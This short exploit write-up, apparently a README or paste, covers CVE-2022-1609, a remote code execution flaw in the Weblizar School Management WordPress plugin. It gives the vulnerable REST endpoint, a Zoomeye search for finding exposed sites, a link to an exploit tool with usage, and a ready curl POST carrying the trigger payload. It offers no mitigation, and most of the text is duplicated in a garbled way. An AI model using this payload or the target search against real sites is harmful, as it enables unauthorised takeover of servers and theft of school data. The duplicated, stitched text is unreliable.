WordPress School Management Remote Code Execution (RCE) vulnerability via Rest API
CVE: CVE-2022-1609
Vendor: Weblizar
Vulnerable path: /wp-json/am-member/license
Zoomeye search: "/wp-content/plugins/school-management"
Proof of concept:
Exploiting with tool
https://github.com/nastar-id/WP-school-management-RCE
Usage python wpsm.py https://localhost
Exploiting manually
Send post data to the vulnerable path
Example with curl:
CVE: CVE-2022-1609
Vendor: Weblizar
Vulnerable path: /wp-json/am-member/license
Zoomeye search: "/wp-content/plugins/school-management"
Proof of concept:
Exploiting with tool
https://github.com/nastar-id/WP-school-management-RCE
Usage python wpsm.py https://localhost
Exploiting manually
Send post data to the vulnerable path
blowfish=1&blowf=rce
Example with curl:
curl -X POST https://localhost/wp-json/am-member/license -d "blowfish=1&blowf=rce"Very easy to exploit



